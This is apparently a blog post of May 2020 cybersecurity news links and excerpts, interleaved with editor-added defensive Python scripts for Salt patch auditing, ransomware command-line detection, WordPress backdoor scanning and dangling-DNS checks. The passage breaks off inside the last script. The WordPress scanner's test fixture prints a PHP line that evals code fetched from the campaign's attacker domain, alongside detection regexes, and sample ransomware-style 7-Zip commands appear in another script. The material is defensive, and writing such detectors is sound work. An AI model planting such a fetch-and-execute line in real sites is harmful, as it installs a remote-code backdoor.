This posting is here to collect cyber security news in May 2020.
I post links to security vulnerability news with short descriptions to the comments section of this article.
If you are interested in cyber security trends, read my Cyber security trends 2020 posting.
You are also free to post related links to comments.
Tomi Engdahl says:
Hackers breach company’s MDM server to spread Android malware
https://www.bleepingcomputer.com/news/security/hackers-breach-company-s-mdm-server-to-spread-android-malware/
Attackers infected more than 75% of a multinational conglomerate’s managed Android devices with the Cerberus banking trojan using the company’s compromised Mobile Device Manager (MDM) server.
MDM (also known as Enterprise Mobility Management – EMM) is a mechanism used by companies of all sizes to enroll enterprise-owned devices with the same management server to make it easier to perform tasks such as delivering company-wide device configurations, deploying applications, and more.
Once deployed onto an Android device, Cerberus can be used by the attackers to steal a wide range of highly sensitive information
After the attackers successfully compromised the unnamed company’s MDM server following a targeted attack, they used it to remotely deploy the banking trojan malware on over 75% of all managed Android devices, as Check Point security researchers discovered.
To get rid of the malware and remove the attackers’ ability to control the infected devices, the company decided to factory reset all devices enrolled with the compromised MDM server.
“This is the first time we have a reported incident of mobile malware distribution that uses the MDM server as an attack vector,” the researchers said.
First Seen In the Wild – Mobile as Attack Vector Using MDM
https://research.checkpoint.com/2020/first-seen-in-the-wild-mobile-as-attack-vector-using-mdm/
Tomi Engdahl says:
Trump bans acquisition of foreign power grid equipment, citing hacking threats
https://www.zdnet.com/article/trump-bans-acquisition-of-foreign-power-grid-equipment-citing-hacking-threats/
White House says foreign-made equipment “augments the ability of foreign adversaries to create and exploit vulnerabilities” in the US power grid.
President Donald Trump signed an executive order today barring US power grid entities from buying and installing electrical equipment that has been manufactured outside the US.
Trump said that “foreign adversaries are increasingly creating and exploiting vulnerabilities in the United States bulk-power system.”
The US president said that successful attacks against the US power grid would “present significant risks to our economy, human health and safety, and would render the United States less capable of acting in defense of itself and its allies.”
Tomi Engdahl says:
Coronavirus: Cyber-spies seek coronavirus vaccine secrets
https://www.bbc.com/news/technology-52490432
The US has seen foreign spy agencies carry out reconnaissance of research into a coronavirus vaccine, a senior US intelligence official has told the BBC.
Bill Evanina, director of the National Counterintelligence and Security Center, said the US government had warned medical research organisations of the risks.
But he would not say whether there had been confirmed cases of stolen data.
Tomi Engdahl says:
https://gizmodo.com/when-your-freedom-depends-on-an-app-1843109198
Tomi Engdahl says:
When your freedom depends on a crappy app, you don’t really have any freedom.
And now they are trying to push contact tracing apps for everybody as solution to COVID-19.
I have not yet made up my mind whether this is an idea that would help or whether the proposed medicine is worse than the disease.
Tomi Engdahl says:
Customers should apply the April 2020 Critical Patch Update without
delay!
https://blogs.oracle.com/security/apply-april-2020-cpu
Oracle has recently received reports of attempts to maliciously
exploit a number of recently-patched vulnerabilities, including
vulnerability CVE-2020-2883, which affects multiple versions of Oracle
WebLogic Server. Oracle strongly recommends that customers apply the
April 2020 Critical Patch Update. The April 2020 Critical Patch Update
advisory is located at
https://www.oracle.com/security-alerts/cpuapr2020.html
Tomi Engdahl says:
Coronavirus: Cyber-spies seek coronavirus vaccine secrets
https://www.bbc.com/news/technology-52490432
Bill Evanina, director of the National Counterintelligence and
Security Center, said the US government had warned medical research
organisations of the risks. But he would not say whether there had
been confirmed cases of stolen data. UK security sources say they
have also seen similar activity.
Tomi Engdahl says:
Scammers Using COVID-19/Coronavirus Lure to Target Medical Suppliers
https://www.fortinet.com/blog/threat-research/scammers-using-covid-19-coronavirus-lure-to-target-medical-suppliers.html
FortiGuard Labs has discovered a new malicious spearphishing campaign,
once again using the COVID-19/Coronavirus pandemic as a lure. This
latest email campaign targets a medical device supplier, wherein the
attacker is inquiring about various materials needed to address the
COVID-19 pandemic due to high demand for supplies, and includes a
compelling statement that they have already tried to reach the
recipient via telephone in order to create a stronger sense of
urgency. The attachment is a maliciously crafted Word document,
utilizing the infamous CVE-2017-11882 (Office Equation Editor)
vulnerability.
Tomi Engdahl says:
Cybersecurity and the economy: when recession strikes
https://blog.malwarebytes.com/cybercrime/2020/04/cybersecurity-and-the-economy-when-recession-strikes/
Cybercrime and the economy have always been intertwined, but with
COVID-19 on the road to causing a seemingly inevitable global
recession, many are asking what, exactly, will the impact be on
cybercrime. Will criminals step up and increase malware production,
ramp up phishing attacks, do whatever it takes to pull in some cash?
Or will it cause a little downturn in malware making and other dubious
dealings?
Tomi Engdahl says:
Advanced Persistent Threat Golden_hands – Digital Bank Robbery of the
Year 2020
https://www.vulnerability-db.com/?q=articles%2F2020%2F04%2F30%2Fadvanced-persistent-threat-goldenhands-digital-bank-robbery-year-2020
This is a story about advanced persistent threats in Germany and the
European Union during the crisis affecting the finance system and
economy sector.
Tomi Engdahl says:
Threat Spotlight: Malicious use of reCaptcha
https://blog.barracuda.com/2020/04/30/threat-spotlight-malicious-recaptcha/
In the never-ending battle between cybersecurity and cybercrime,
cybercriminals continue to find new techniques to evade detection. One
such trick Barracuda researchers have started seeing more often in
phishing campaigns uses reCaptcha walls to block URL scanning services
from accessing the content of phishing pages.
Tomi Engdahl says:
The Russian Doll of Putin’s Internet Clampdown
https://www.wired.com/story/opinion-the-russian-doll-of-putins-internet-clampdown/
The Kremlin’s path toward censorship, surveillance, and repression has
many more layers than meets the eye.
Tomi Engdahl says:
Hackers breach LineageOS servers via unpatched vulnerability
https://www.zdnet.com/article/hackers-breach-lineageos-servers-via-unpatched-vulnerability/#ftag=RSSbaffb68
Hackers have gained access to the core infrastructure of LineageOS, a
mobile operating system based on Android, used for smartphones,
tablets, and set-top boxes. The intrusion took place last night, on
Saturday, at around 8 pm (US Pacific coast), and was detected before
the attackers could do any harm, the LineageOS team said in a
statement published less than three hours after the incident.
LineageOS developers said the hack took place after the attacker used
an unpatched vulnerability to breach its Salt installation.
Tomi Engdahl says:
Ghost blogging platform suffers security breach
https://www.grahamcluley.com/ghost-blogging-platform-suffers-security-breach/
The open-source blogging platform Ghost has suffered a serious
security scare, no doubt sending shivers down the spines of some of
its users. In a later update on the security breach, Ghost said that
its investigations had determined that attackers had exploited a
critical vulnerability in Salt, the open-source software used by data
centers and cloud servers, in an attempt to mine cryptocurrency on its
servers. also: https://status.ghost.org/incidents/tpn078sqk973
Tomi Engdahl says:
Canadians have lost more than $1.2 million to COVID-19 scams
https://www.cbc.ca/news/politics/covid-scams-fraud-crime-1.5551294
Jeff Thomson of the Canadian Anti-Fraud Centre said the centre has
received 739 reports since March 6 of attempts to defraud Canadians
with scams related to the pandemic. He said 178 of those attempts
succeeded. The centre is also seeing attempts to use the pandemic as
cover to infect computers with malware.
Tomi Engdahl says:
Love Bug’s creator tracked down to repair shop in Manila
https://www.bbc.com/news/technology-52458765
The man behind the world’s first major computer virus outbreak has
admitted his guilt, 20 years after his software infected millions of
machines worldwide.
Tomi Engdahl says:
2020 Gartner Magic Quadrant for Application Security Testing
https://www.synopsys.com/software-integrity/resources/analyst-reports/2020-gartner-magic-quadrant.html?cmp=em-sig-gartnermq&utm_medium=email&utm_source=website
Synopsys is a Leader for the Fourth Year in a Row
Synopsys Placed Highest for Ability to Execute and Furthest to the Right for Completeness of Vision
Tomi Engdahl says:
Recent Salt Vulnerabilities Exploited to Hack LineageOS, Ghost, DigiCert Servers
By Ionut Arghire on May 04, 2020
https://www.securityweek.com/recent-salt-vulnerabilities-exploited-hack-lineageos-ghost-digicert-servers
Over the past several days, hackers have exploited two recently disclosed Salt vulnerabilities to compromise the servers of LineageOS, Ghost and DigiCert.
Managed by SaltStack, Salt is an open-source configuration tool to monitor and update the state of servers in both datacenters and cloud environments. Called minions, agents installed on servers connect to a master to deliver state reports (to a “request server”) and receive updates (from a “publish server”).
Last week, F-Secure security researchers disclosed two vulnerabilities in Salt (CVE-2020-11651 and CVE-2020-11652) that could allow remote attackers to execute commands as root on “master” and connected minions. The most severe of the bugs has a CVSS score of 10.
The vulnerabilities could allow an attacker to bypass authentication and authorization controls, “and publish arbitrary control messages, read and write files anywhere on the ‘master’ server filesystem and steal the secret key used to authenticate to the master as root,” F-Secure said last week.
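Two things a practitioner wants to know after reading the above: is this master on a fixed release, and are its request/publish ports reachable from outside. The check below is an added example by the editor, not code from the article, F-Secure or SaltStack. The fixed release numbers (2019.2.4 and 3000.2) and the default ports 4505/4506 come from SaltStack's advisory rather than the text above; the master config fragment is constructed, and the "reachable from the internet" flag is something the caller supplies from an external port scan.

```python
import re

# First releases carrying the fix for CVE-2020-11651 and CVE-2020-11652:
# 2019.2.4 and 3000.2 (SaltStack, 29 April 2020). Editor-supplied fact; the
# article above does not list the versions.
def parse_version(text):
    """Extract a Salt version tuple from e.g. 'salt-master 2019.2.3' or '3000.1'."""
    m = re.search(r"\b(\d{4})(?:\.(\d+))?(?:\.(\d+))?\b", text)
    if not m:
        raise ValueError(f"no Salt version in {text!r}")
    return tuple(int(p) for p in m.groups() if p is not None)

def is_patched(version_text):
    """True when the version is at or above the first fixed release of its branch."""
    v = parse_version(version_text)
    if v[0] >= 3000:                  # 3000.x and later branches
        return v >= (3000, 2)
    if v[:2] == (2019, 2):            # 2019.2.x branch
        return v >= (2019, 2, 4)
    return False                      # older branches were not patched; upgrade

def master_exposure(config_text):
    """Read the /etc/salt/master keys that govern network exposure, falling back to
    Salt's documented defaults (all interfaces, publish 4505, request 4506)."""
    conf = {"interface": "0.0.0.0", "publish_port": 4505, "ret_port": 4506}
    for key in conf:
        m = re.search(rf"^\s*{key}\s*:\s*(\S+)", config_text, re.M)
        if m:
            conf[key] = int(m.group(1)) if key.endswith("port") else m.group(1)
    return conf

def audit(version_text, config_text, reachable_from_internet):
    """reachable_from_internet: result of an external port check, supplied by the caller."""
    findings = []
    if not is_patched(version_text):
        ver = ".".join(map(str, parse_version(version_text)))
        findings.append(f"unpatched Salt {ver}: upgrade to 2019.2.4 / 3000.2 or later")
    exp = master_exposure(config_text)
    if exp["interface"] == "0.0.0.0" and reachable_from_internet:
        findings.append(f"master listens on all interfaces and ports "
                        f"{exp['publish_port']}/{exp['ret_port']} are reachable: "
                        f"restrict them to minion networks")
    return findings

# Constructed master config fragment (not from any real deployment).
SAMPLE_MASTER_CONF = """# /etc/salt/master
interface: 0.0.0.0
publish_port: 4505
ret_port: 4506
"""

if __name__ == "__main__":
    for f in audit("salt-master 3000.1", SAMPLE_MASTER_CONF, reachable_from_internet=True):
        print("FINDING:", f)
```

Feed it the output of `salt-master --version` and the master config; the port-reachability flag should come from a scan run from outside the management network, since a master bound to 0.0.0.0 behind a firewall is not the same exposure as one on a public address.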
Tomi Engdahl says:
This new cybersecurity school will teach kids to crack codes from home
https://www.zdnet.com/article/this-new-cybersecurity-school-will-teach-kids-to-crack-codes-from-home/
Online initiative looks to inspire a new generation of cybersecurity talent to bring out their ‘digital Sherlock Holmes’ while schools remain closed.
Tomi Engdahl says:
Several Vulnerabilities Patched With Release of WordPress 5.4.1
https://www.securityweek.com/several-vulnerabilities-patched-release-wordpress-541
Several vulnerabilities, most of which have been described as cross-site scripting (XSS) flaws, have been patched in WordPress this week with the release of version 5.4.1.
WordPress 5.4.1, described as a short-cycle security and maintenance release, fixes 17 bugs and 7 vulnerabilities affecting version 5.4 and earlier. WordPress developers pointed out that all versions newer than 3.7 have been updated as well.
Tomi Engdahl says:
Criminals Quick to Exploit COVID-19 Crisis in Europe
https://www.securityweek.com/criminals-quick-exploit-covid-19-crisis-europe
Tomi Engdahl says:
EU Demands End to Coronavirus Cyberattacks
https://www.securityweek.com/eu-demands-end-coronavirus-cyberattacks
The European Union on Thursday accused unnamed parties of exploiting the coronavirus pandemic to launch cyberattacks on infrastructure and healthcare services.
A flood of cyberattacks has targeted European countries, affecting critical systems needed to deal with the virus crisis, said foreign policy chief Josep Borrell in a statement on behalf of all 27 EU members.
“The European Union and its Member States condemn this malicious behaviour in cyberspace,” Borrell said.
“Any attempt to hamper the ability of critical infrastructures is unacceptable. All perpetrators must immediately refrain from conducting such irresponsible and destabilising actions, which can put people’s lives at risk.”
Earlier this month the United States voiced concern about cyber assaults targeting Czech hospitals — several of which managed to fight off attempted attacks.
Internet users have seen a surge in COVID-related attacks and fraud schemes, including phishing emails purportedly from health agencies, counterfeit product offers and bogus charity donation requests.
Tomi Engdahl says:
Geoff White / BBC:
Filipino Onel de Guzman, author of the Love Bug worm that infected millions of PCs in May 2000, talks about his creation and claims he regrets writing it — The man behind the world’s first major computer virus outbreak has admitted his guilt, 20 years after his software infected millions of machines worldwide.
Love Bug’s creator tracked down to repair shop in Manila
https://www.bbc.com/news/technology-52458765
Tomi Engdahl says:
Red Web: Russia draws state borders in cyberspace
https://ulkopolitist.fi/2020/05/04/venaja-piirtaa-valtiollisia-rajoja-bittiavaruuteen/
Russia wants to achieve digital independence by 2024 and is therefore
building a national internet. Russia’s own national internet is a
project with roots in the Soviet era that could serve as a model for
those authoritarian states wondering how to bring the internet under
state control. Such “nationalisations” of the internet would
significantly change the nature of the global network.
Tomi Engdahl says:
New Malware Jumps Air-Gapped Devices by Turning Power-Supplies into
Speakers
https://thehackernews.com/2020/05/air-gap-malware-power-speaker.html
A researcher from Israel’s Ben Gurion University of the Negev recently
demonstrated a new kind of malware that could be used to covertly
steal highly sensitive data from air-gapped and audio-gapped systems
using a novel acoustic quirk in power supply units that come with
modern computing devices. Dubbed ‘POWER-SUPPLaY’, the latest research
builds on a series of techniques leveraging electromagnetic, acoustic,
thermal, optical covert channels, and even power cables to exfiltrate
data from non-networked computers.
Tomi Engdahl says:
Denmark, Sweden, Germany, the Netherlands and France SIGINT Alliance
https://www.schneier.com/blog/archives/2020/05/denmark_sweden_.html
This paper describes a SIGINT and code-breaking alliance between
Denmark, Sweden, Germany, the Netherlands and France called Maximator.
paper:
https://www.tandfonline.com/doi/full/10.1080/02684527.2020.1743538
Tomi Engdahl says:
OK, so you’ve air-gapped that PC. Cut the speakers. Covered the LEDs. Disconnected the monitor. Now, about the data-leaking power supply unit…
I have no mouth, and I must scream
https://www.theregister.co.uk/2020/05/04/power_supply_attack/
Tomi Engdahl says:
Older power supply information leakage links
https://www.researchgate.net/publication/324472268_PowerHammer_Exfiltrating_Data_from_Air-Gapped_Computers_through_Power_Lines
https://www.zdnet.com/article/how-safe-is-your-air-gapped-pc-attackers-can-now-suck-data-out-via-power-lines/
Tomi Engdahl says:
TP-Link Patches Multiple Vulnerabilities in NC Cloud Cameras
https://www.securityweek.com/tp-link-patches-multiple-vulnerabilities-nc-cloud-cameras
Tomi Engdahl says:
Most Malicious Coronavirus-Related Domains Located in U.S.
https://www.securityweek.com/most-malicious-coronavirus-related-domains-located-us
Tomi Engdahl says:
Power Supply Can Turn Into Speaker for Data Exfiltration Over Air Gap
https://www.securityweek.com/power-supply-can-turn-speaker-data-exfiltration-over-air-gap
Tomi Engdahl says:
New Executive Order Aims to Protect U.S. Power Grid From Backdoored Equipment
https://www.securityweek.com/new-executive-order-aims-protect-us-power-grid-backdoored-equipment
A new executive order signed on Friday by U.S. President Donald Trump prohibits the acquisition of bulk-power system equipment that could contain intentional backdoors planted by foreign adversaries.
Incidents where threat actors targeted a country’s power grid and even caused disruptions are not unheard of, and even the United States reportedly targeted Russia’s grid in such attacks.
The U.S. government appears to be concerned that foreign adversaries could be trying to plant malicious or vulnerable equipment in the country’s power grid. That is why the latest executive order prohibits the acquisition of bulk-power system electric equipment that is designed, developed, manufactured or supplied by an entity that is “controlled by, or subject to the jurisdiction or direction of a foreign adversary.”
Tomi Engdahl says:
Godaddy Hacked : 19 Million Customers at Risk
https://hackernewsdog.com/godaddy-hacked-breached-stolen-data/?fbclid=IwAR2h5XuWSsnrC8HHsDqGSyF2S2GEIVQnxh0F-T5YkWNaSBiiBPZ35Yu5Bc4
Big Breaking News Just coming In
GoDaddy just confirmed its data breach on 5 May 2020, putting 19 million customers at risk.
One of the biggest domain registrars and web hosting firms, GoDaddy, today publicly announced a data breach that impacted millions of hosting account customers. This incident goes back to October 2019, when one hacker was able to access the SSH login information of some customers’ hosting accounts. Later the company’s security team observed suspicious activity on some accounts.
Although the company said “It did not impact main customer accounts”, we are not sure what they mean by “main customers”.
Tomi Engdahl says:
GoDaddy Hack Breaches Hosting Account Credentials
https://threatpost.com/godaddy-hack-breaches-hosting-account-credentials/155475/
The domain registrar giant said that the breach started in October 2019.
GoDaddy, the world’s largest domain name registrar, is warning customers that attackers may have obtained their web hosting account credentials.
An “unauthorized individual” was able to access users’ login details in an intrusion that took place back in October.
Tomi Engdahl says:
New VCrypt Ransomware locks files in password-protected 7ZIPs
https://www.bleepingcomputer.com/news/security/new-vcrypt-ransomware-locks-files-in-password-protected-7zips/
A new ransomware called VCrypt is targeting French victims by
utilizing the legitimate 7zip command-line program to create
password-protected archives of data folders.
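Because VCrypt rides on a legitimate, signed archiver, file-hash detection does nothing; what stands out is the command line. The scorer below is an added example by the editor, not code from the BleepingComputer write-up or from any EDR product. The process events are constructed, and the exact 7-Zip switches shown (-p for the password, -mhe=on for encrypted headers) are assumed for illustration; the report only says the ransomware creates password-protected 7-Zip archives of data folders.

```python
import re

# Constructed process-creation events (image name, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("7z.exe", r'7z.exe a -p"Qx91!zt" -mhe=on "C:\Users\alice\Documents.7z" "C:\Users\alice\Documents\*"'),
    ("7z.exe", r"7z.exe x backup.7z -oC:\restore"),
    ("7za.exe", r"7za.exe a -pS3cret -mx=1 D:\Pictures.7z D:\Pictures"),
    ("7z.exe", r"7z.exe a -pBuildKey C:\build\artifact.7z C:\build\out"),
    ("notepad.exe", r"notepad.exe C:\notes.txt"),
]

SEVENZIP_IMAGES = {"7z.exe", "7za.exe", "7zr.exe", "7zg.exe"}
ADD_COMMAND = re.compile(r"^\S+\s+a(\s|$)", re.I)          # "7z a ..." creates an archive
PASSWORD_SWITCH = re.compile(r"(^|\s)-p\S", re.I)           # -p<password>
HEADER_ENCRYPT = re.compile(r"(^|\s)-mhe=on(\s|$)", re.I)   # also hides file names
USER_DATA = re.compile(
    r'\\users\\[^\\"]+\\(documents|desktop|pictures|videos)\b'
    r"|[a-z]:\\(documents|pictures|videos)\b", re.I)

def score_event(image, cmdline):
    """Return (score, reasons) for one event. Archive creation by 7-Zip earns one
    point per ransomware-like trait; build and backup jobs usually score at most 1."""
    reasons = []
    if image.lower() not in SEVENZIP_IMAGES or not ADD_COMMAND.match(cmdline):
        return 0, reasons
    if PASSWORD_SWITCH.search(cmdline):
        reasons.append("password-protected archive (-p)")
    if HEADER_ENCRYPT.search(cmdline):
        reasons.append("encrypted archive headers (-mhe=on)")
    if USER_DATA.search(cmdline):
        reasons.append("targets user data folders")
    return len(reasons), reasons

def flag_events(events, threshold=2):
    """Return [(command line, reasons)] for events at or above the threshold."""
    flagged = []
    for image, cmdline in events:
        score, reasons = score_event(image, cmdline)
        if score >= threshold:
            flagged.append((cmdline, reasons))
    return flagged

if __name__ == "__main__":
    for cmdline, reasons in flag_events(SAMPLE_EVENTS):
        print(f"ALERT {cmdline}\n      {'; '.join(reasons)}")
```

The threshold exists because password-protected archives are normal on build servers and in backup jobs; in practice you would also weigh the parent process (a user-profile executable spawning 7z.exe is far more interesting than a scheduled task) and the rate of archive creation per host.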
Tomi Engdahl says:
Airplane Hack Exposes Weaknesses of Alert and Avoidance Systems
https://threatpost.com/airplane-hack-exposes-weaknesses-of-alert-and-avoidance-systems/155451/
The aircraft safety system known as the Traffic Alert and Collision
Avoidance System (TCAS) can be coerced into sending an airplane on a
mid-air rollercoaster ride much to the horror of those onboard.
Researchers were able to cobble together an effective method for
spoofing the TCAS using a $10 USB-based Digital Video Broadcasting
dongle and a rogue transponder, for communicating with aircraft. “We
have shown that careful placing of fake aircraft through rogue
transponder broadcasts can cause an aircraft under autopilot control
to climb or descend towards legitimate traffic, ” wrote Pen Test
Partners’ Ken Munro in a blog post outlining his research. also:
https://www.pentestpartners.com/security-blog/jeopardising-aircraft-through-tcas-spoofing/
Tomi Engdahl says:
Mitigating vulnerabilities in endpoint network stacks
https://www.microsoft.com/security/blog/2020/05/04/mitigating-vulnerabilities-endpoint-network-stacks/
One aspect of our proactive security work is finding vulnerabilities
and fixing them before they can be exploited. Innovations we’ve made
in our fuzzing technology have made it possible to get deeper coverage
than ever before, resulting in the discovery of new bugs, faster. One
such vulnerability is the remote code vulnerability (RCE) in Microsoft
Server Message Block version 3 (SMBv3) tracked as CVE-2020-0796 and
fixed on March 12, 2020. In the following sections, we will share the
tools and techniques we used to fuzz SMB, the root cause of the RCE
vulnerability, and relevant mitigations to exploitation.
Tomi Engdahl says:
APT Groups Target Healthcare and Essential Services – Alert
(AA20-126A)
https://www.us-cert.gov/ncas/alerts/AA20126A
CISA and NCSC continue to see indications that advanced persistent
threat (APT) groups are exploiting the Coronavirus Disease 2019
(COVID-19) pandemic as part of their cyber operations. This joint
alert highlights ongoing activity by APT groups against organizations
involved in both national and international COVID-19 responses. It
describes some of the methods these actors are using to target
organizations and provides mitigation advice.
Tomi Engdahl says:
Toll Group hit by ransomware a second time, deliveries affected
https://www.bleepingcomputer.com/news/security/toll-group-hit-by-ransomware-a-second-time-deliveries-affected/
The Toll Group has suffered its second ransomware cyberattack in three
months, with the latest one conducted by the operators of the Nefilim
Ransomware. Toll Group is Asia Pacific’s leading provider of
transportation and logistics services, employing roughly 44,000 people
at 1,200 locations in more than 50 countries. also:
https://www.tollgroup.com/toll-it-systems-updates
Tomi Engdahl says:
Malicious Use of AI Poses a Real Cybersecurity Threat
https://www.darkreading.com/vulnerabilities—threats/malicious-use-of-ai-poses-a-real-cybersecurity-threat/a/d-id/1337690
We should prepare for a future in which artificially intelligent
cyberattacks become more common. also:
https://www.foi.se/report-summary?reportNo=FOI-R–4947–SE
Tomi Engdahl says:
Google Android RCE Bug Allows Attacker Full Device Access
https://threatpost.com/google-android-rce-bug-full-device-access/155460/
The vulnerability is one of 39 affecting various aspects of the mobile
OS that the company fixed in a security update this week.
Android’s May 2020 Patches Fix Critical System Vulnerability
https://www.securityweek.com/androids-may-2020-patches-fix-critical-system-vulnerability
Google this week released the May 2020 security patches for the Android operating system, which address several critical vulnerabilities, including one affecting the System component.
A total of 39 vulnerabilities were patched with the release, split into two parts: 15 received fixes as part of the 2020-05-01 security patch level, and 24 were addressed with the 2020-05-05 security patch level.
Tomi Engdahl says:
https://www.forbes.com/sites/daveywinder/2020/05/05/godaddy-confirms-data-breach-what-19-million-customers-need-to-know/
Tomi Engdahl says:
With more than 19 million customers, 77 million domains managed, and millions of websites hosted, most everyone has heard of GoDaddy. According to Bleeping Computer, which broke the news yesterday evening, an as yet unknown number of customers have been informed that their web hosting account credentials had been compromised
https://www.forbes.com/sites/daveywinder/2020/05/05/godaddy-confirms-data-breach-what-19-million-customers-need-to-know/
Tomi Engdahl says:
COVID-19: Cloud Threat Landscape
https://unit42.paloaltonetworks.com/covid-19-cloud-threat-landscape/
Unit 42 researchers analyzed 1.2 million newly registered domain (NRD)
names containing keywords related to the COVID-19 pandemic from March
9, 2020 to April 26, 2020 (7 weeks). 86,600+ domains are classified
as “risky” or “malicious”, spread across various regions, as shown in
Figure 1. The United States has the highest number of malicious
domains (29,007), followed by Italy (2,877), Germany (2,564), and
Russia (2,456).
Cyber volunteers release blocklists for 26,000 COVID-19 threats
https://www.bleepingcomputer.com/news/security/cyber-volunteers-release-blocklists-for-26-000-covid-19-threats/
The COVID-19 Cyber Threat Coalition has released a block list of known
URLs and domain names associated with Coronavirus-themed scams,
phishing attacks, and malware threats. The URL blocklist currently
consists of 13,863 malicious URLs that have been seen in attacks, and
the domain blocklist now contains 12,258 malicious domains and
hostnames.
Tomi Engdahl says:
Nearly a Million WP Sites Targeted in Large-Scale Attacks
https://www.wordfence.com/blog/2020/05/nearly-a-million-wp-sites-targeted-in-large-scale-attacks/
Our Threat Intelligence Team has been tracking a sudden uptick in
attacks targeting Cross-Site Scripting(XSS) vulnerabilities that began
on April 28, 2020 and increased over the next few days to
approximately 30 times the normal volume we see in our attack data.
The majority of these attacks appear to be caused by a single threat
actor, based on the payload they are attempting to inject a malicious
JavaScript that redirects visitors and takes advantage of an
administrator’s session to insert a backdoor into the theme’s header.
Nearly 1 Million WordPress Sites Targeted via Old Vulnerabilities
https://www.securityweek.com/nearly-1-million-wordpress-sites-targeted-old-vulnerabilities
A large-scale attack campaign has targeted over 900,000 WordPress websites through vulnerabilities in plugins and themes, WordPress security company Defiant revealed this week.
The attacks were initially discovered on April 28, but showed a massive spike on May 3, when more than half a million websites were hit. Likely the work of a single threat actor, the campaign is aimed at injecting the target websites with malicious JavaScript designed to redirect visitors to malvertising sites.
Responsible for only a small volume of attacks in the past, the threat actor has ramped up the operation, with over 20 million attacks registered on May 3. The researchers discovered that, over the past month, over 24,000 distinct IP addresses were used to attack more than 900,000 sites.
The targeted vulnerabilities are not new and have been abused in previous attacks as well. These include Cross-Site Scripting (XSS) vulnerabilities in the Easy2Map plugin (removed from the WordPress repository in August 2019), Blog Designer (patched in 2019), and Newspaper theme (patched in 2016), and options update bugs in WP GDPR Compliance (patched in late 2018), and Total Donations (removed in early 2019).
The JavaScript code the attackers attempt to insert into the targeted websites is located at count[.]trackstatisticsss[.]com/stm and also checks whether the victim has any WordPress login cookies set. The attackers hope that the script would be executed in an administrator’s browser.
Admins who are not logged in and are not on the login page are redirected to a malvertising site. Otherwise, the script attempts to inject a malicious PHP backdoor into the current theme’s header, along with a second malicious JavaScript.
The backdoor downloads another payload from https://stat.trackstatisticsss.com/n.txt and attempts to execute it by including it in the theme header.
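Since the payload lands in the active theme's header file, the quickest triage is to scan theme PHP files for the campaign domain, for script tags loading from hosts the theme has no business using, and for PHP that fetches remote code and executes it. The scanner below is an added example by the editor, not code from Wordfence or SecurityWeek. The only indicator taken from the write-up is the trackstatisticsss.com domain; the script-host allow-list and the "remote code" regexes are assumed heuristics, and both header.php fragments are constructed to mimic the described behaviour rather than copied from an infected site.

```python
import os
import re

# Campaign indicator from the write-up above.
IOC_DOMAINS = ("trackstatisticsss.com",)

# Hosts a theme is expected to load scripts from; anything else is reported.
# Assumed for the example; tune per site.
ALLOWED_SCRIPT_HOSTS = {"cdnjs.cloudflare.com", "ajax.googleapis.com"}

SCRIPT_SRC = re.compile(
    r"<script[^>]*\ssrc\s*=\s*['\"]?(https?://([^/'\"\s>]+)[^'\"\s>]*)", re.I)
# Generic "fetch remote code and run it" shapes in PHP. Heuristics assumed for the
# example, not the campaign's exact backdoor.
REMOTE_CODE = [
    ("remote-include", re.compile(
        r"\b(include|require)(_once)?\s*\(?\s*['\"]https?://", re.I)),
    ("eval-fetched", re.compile(
        r"\beval\s*\(\s*@?(file_get_contents|curl_exec|base64_decode|gzinflate)\s*\(", re.I)),
]

def scan_theme_header(source, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return [(finding, evidence)] for the text of one theme PHP file."""
    findings = []
    lowered = source.lower()
    for domain in IOC_DOMAINS:
        if domain in lowered:
            findings.append(("ioc-domain", domain))
    for url, host in SCRIPT_SRC.findall(source):
        if host.lower() not in allowed_hosts:
            findings.append(("unexpected-script-host", url))
    for tag, pattern in REMOTE_CODE:
        for match in pattern.finditer(source):
            findings.append((tag, match.group(0)))
    return findings

def scan_theme_dir(theme_dir):
    """Walk wp-content/themes/<theme> and return {path: findings} for PHP files with hits."""
    results = {}
    for root, _, files in os.walk(theme_dir):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(root, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_theme_header(fh.read())
                if hits:
                    results[path] = hits
    return results

# Constructed header.php fragments (not real theme code).
CLEAN_HEADER = """<?php wp_head(); ?>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
"""
INFECTED_HEADER = """<?php
@eval(file_get_contents("https://stat.trackstatisticsss.com/n.txt"));
wp_head(); ?>
<script src="https://count.trackstatisticsss.com/stm"></script>
"""

if __name__ == "__main__":
    for tag, evidence in scan_theme_header(INFECTED_HEADER):
        print(f"{tag}: {evidence}")
```

A clean scan is not proof of a clean site: the campaign's JavaScript runs in an administrator's browser and can just as well add a rogue admin user or edit a plugin instead of the header, so pair this with a user audit and file-integrity comparison against a fresh copy of the theme.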
Tomi Engdahl says:
Now we know what the P really stands for in PwC: X-rated ads plastered
over derelict corner of accountants’ website
https://www.theregister.co.uk/2020/05/06/pwc_azure_squatting/
A forgotten subdomain on PricewaterhouseCoopers’ dot-com has been
hijacked to host ads for porno websites and apps, neatly demonstrating
why you should not neglect your corporate DNS records.
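The usual mechanism behind this kind of hijack is a CNAME left pointing at a cloud resource (the Register piece concerns an Azure one) that was deleted, after which anyone can create a resource with the same name and receive the traffic. The zone audit below is an added example by the editor, not code from the article or from PwC. The zone records are constructed for a hypothetical example.org, the suffix list of takeover-prone services is an assumption, and the resolver is injectable so the demonstration runs without network access.

```python
import socket

# Hosting targets whose abandoned names can be re-registered by a third party.
# Assumed list for illustration; extend it for the providers your organisation uses.
TAKEOVER_SUFFIXES = (
    ".azurewebsites.net", ".cloudapp.net", ".cloudapp.azure.com",
    ".trafficmanager.net", ".blob.core.windows.net", ".azureedge.net",
    ".s3.amazonaws.com", ".herokuapp.com", ".github.io",
)

def live_resolves(host):
    """Real resolver: True if the host still has an address record (needs network)."""
    try:
        socket.getaddrinfo(host, None)
        return True
    except socket.gaierror:
        return False

def find_dangling(records, resolves=live_resolves):
    """records: iterable of (owner, rtype, target) from a zone export.
    Returns [(owner, target)] for CNAMEs that point at a takeover-prone host
    which no longer resolves."""
    dangling = []
    for owner, rtype, target in records:
        if rtype.upper() != "CNAME":
            continue
        t = target.rstrip(".").lower()
        if any(t.endswith(sfx) for sfx in TAKEOVER_SUFFIXES) and not resolves(t):
            dangling.append((owner, t))
    return dangling

# Constructed zone fragment for a hypothetical example.org (not PwC's records).
SAMPLE_ZONE = [
    ("www.example.org.", "A", "203.0.113.10"),
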